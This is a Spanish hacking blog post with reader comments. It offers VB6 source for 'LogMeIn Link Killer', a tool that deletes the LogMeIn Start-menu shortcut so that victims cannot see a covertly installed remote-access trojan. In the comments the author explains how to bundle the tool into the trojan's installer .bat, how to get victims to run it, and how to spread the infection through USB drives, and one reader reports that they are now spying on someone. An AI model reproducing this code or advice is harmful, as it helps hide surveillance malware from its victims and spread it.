LogMeIn Link Killer

Esta extremadamente pequeña aplicacion, sirve para eliminar el acceso directo de logmein del menu de inicio de windows.

La apliacion es util para el troyano. FUNCIONA en windows XP, Vista, Seven

Este es el codigo:

[cc lang=”VB”]Private Declare Function SHGetSpecialFolderLocation Lib “shell32.dll” ( _
ByVal hwndOwner As Long, _
ByVal nFolder As Long, _
pidl As ITEMIDLIST) As Long
Private Declare Function SHGetPathFromIDList Lib “shell32.dll” Alias “SHGetPathFromIDListA” ( _
ByVal pidl As Long, _
ByVal pszPath As String) As Long
Private Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type

Private Const CSIDL_STARTMENU = &HB
Private Const CSIDL_PROGRAMS = &H2
Private Const CSIDL_COMMON_STARTMENU = &H16
Private Const CSIDL_COMMON_PROGRAMS = &H17

Private Sub Form_Load()
‘Primero vemos si existe el acceso directo
If Dir(GetSpecialfolder(CSIDL_COMMON_PROGRAMS) & “\LogMeIn.lnk”, vbNormal) = “” Then
MsgBox “No se encuentra el acceso directo”, vbCritical, “Error    —   Lordblacksuca”
End
End If
‘si existe, lo matamos
Call Kill(GetSpecialfolder(CSIDL_COMMON_PROGRAMS) & “\LogMeIn.lnk”)
End
End Sub

‘————————————————————————-
‘FUNCIONES
‘————————————————————————-

Private Function GetSpecialfolder(CSIDL As Long) As String
Dim ret As Long, IDL As ITEMIDLIST
ret = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If ret = NOERROR Then
Path$ = Space$(512)
ret = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) – 1)
Exit Function
End If
GetSpecialfolder = “”

End Function[/cc]
LogMeIn guarda el acceso directo en la carpeta comun a todos los usuarios..  es decir AllUsers
Bueno, aca esta la descarga del archivo ejecutable por Rapidshare
Saludos! recuerden, ante cualquier duda, comenten, y si no tienen dudas, bueno, comenten tambien!!.
Solución a los ataques SQL-Injection y de etiquetas html, php etc.
11 December, 2010
Vulnerabilidad en WordPress Superpuperdomain2.com
18 August, 2011
Dhackers está de vuelta!!!
18 November, 2009
24 Comments
  • Reply
    mamue
    26 December, 2009 at 6:26 PM

    Lordblacksuca que pena mi ignorancia ¿cómo se usa? Soy un poco novato
    Y gracias por responder.

  • Reply
    Lordblacksuca
    27 December, 2009 at 4:18 PM

    simplemente ejecutas el archivo ejecutable y el acceso directo desaparecera

  • Reply
    mamue
    27 December, 2009 at 4:23 PM

    Ya gracias lo coloque en el .bat de logmein y el ase todo ya tengo todo listo y funcionando gracias por todo en otra ocasión te vuelvo a molestar.

  • Reply
    Lordblacksuca
    27 December, 2009 at 4:26 PM

    buenisimo fantastico…. cualquier cosa que te haga falta me decis.

  • Reply
    Ulises21
    7 January, 2010 at 4:21 PM

    Amigo esta muy bueno todo esto, lo unico es que no puedo bajar de rapidshare llevo dos dias intentando, podrias subirlo a Megaupload u otro similar.

    Eres grande en esto men el instalador silencioso me funciona bien solo me falta este ejecutable para borrar rastros.
    Te agradezco mucho tu tiempo y atencion

  • Reply
    gioferman
    9 February, 2010 at 7:37 AM

    Lordblacksuca sos GRANDE.
    GRACIAS por tu aporte,
    en noviembre, tenias el link de descarga para hacerlo exe, no lo veo ahora, ayudame q me han robado el portatil y ahora debo hacerlo todo denuevo…

    de antemano altamente agradecido, sos un GENIO!!!
    Jehova te bendiga e ilumine…

    • Reply
      Lordblacksuca
      11 February, 2010 at 6:33 PM

      muchas graias!!!

      para haer exe que cosa? el troyano?

  • Reply
    Amy
    19 April, 2010 at 12:39 AM

    Ya gracias lo coloque en el .bat de logmein y el ase todo ya tengo todo listo y funcionando gracias por todo en otra ocasión te vuelvo a molestar.

  • Reply
    jorge
    31 May, 2010 at 3:07 PM

    Hey conchales mi pregunta es si este archivo se ejecuta de inmediato cuando la persona recibe el zip o rar por msn ?

    • Reply
      Lordblacksuca
      31 May, 2010 at 3:33 PM

      No, hay que hacer que la victima lo ejecute de alguna forma, la idea, es que este archivo lo incluyas en el instalador del troyano y lo ejecutes con el mismo bat.

  • Reply
    jorge
    31 May, 2010 at 4:33 PM

    Lord, entonces la victima recibe un zip y en ese zip viene un exe ? ke me recomiendas ke haga primero ?

  • Reply
    Gwko
    31 May, 2010 at 11:40 PM

    Lord me infecto yo mismo no hay problema ?

  • Reply
    Gwko
    1 June, 2010 at 1:24 AM

    Lord logre hacer el bat del Kill linker jajajja ya toy espiando genialllllllllllllll

  • Reply
    Gwko
    1 June, 2010 at 11:36 AM

    Lord una pregunta ke posibilidades hay que hagas este hack con la version Pro

  • Reply
    Lordblacksuca
    1 June, 2010 at 12:25 PM

    Si te infectas a ti mismo, no hay problema… para desinstalar el logmein, reemplazas los dll modificados por los originales, luego, lo paras, y te aparece en la lista de agregar o quitar programas en el panel de control.

    En la version pro, no cambia nada, ya que el logmein en si es el mismo, cambia la interfaz web que te ofrece logmein en su pagina.

  • Reply
    Gwko
    3 June, 2010 at 3:48 AM

    Lord una pregunta este virus no lo puedes hacer viral ? osea ke cuando metan un pendrive en el infectado se propague a donde vaya el Pen jajaj seria interesante… otra pregunta cuando lo haces con el Team viewer

    • Reply
      Lordblacksuca
      3 June, 2010 at 1:41 PM

      Se puede hacer sin problemas haciendo que se infecten los pendrives con el downloader.
      nunca he usado teamviewer.

  • Reply
    lord
    29 November, 2010 at 2:00 AM

    men como puedo hacer una aplicacion como esta pero para eliminar un archivo del escritorio? no tengo conocimiento de vb. Si podria facilitarme el codigo por favor

  • Reply
    lord
    29 November, 2010 at 7:14 PM

    Si alguien puede ayudarme a conseguir ese codigo (Para vb; un .exe para eliminar archivos, por ejemplo de mi escritorio) Se lo agradeceria enormemente

    • Reply
      Lordblacksuca
      29 November, 2010 at 7:19 PM

      con esta funcion borras archivos en VB6

      kill “c:\archivo.txt”

  • Reply
    lord
    29 November, 2010 at 10:10 PM

    el vb me tira error de Syntaxis. disculpen esq

  • Reply
    lord
    29 November, 2010 at 10:11 PM

    el vb me tira error de Syntaxis. disculpen es que se usar el vb. puedes copiar el codigo completo por favor y disculpa mi ignorancia

  • Reply
    lord
    30 November, 2010 at 12:21 AM

    alguien que me ayude por favorrrrrrrrrrr! ya hice loq me dijo BLacksuca (gracias men) pero no se elimina el archivo del escritorio con el que hago la prueba.

    Se que es una bobada lo que estoy pidiendo pero NO se usar vb. Alguien que pueda decirme el codigo completo de vb para eliminar un archivo que este en escritorio, o me pase el proyect :s AYUDA! HELP!

Leave a Reply

Your email address will not be published. Required fields are marked *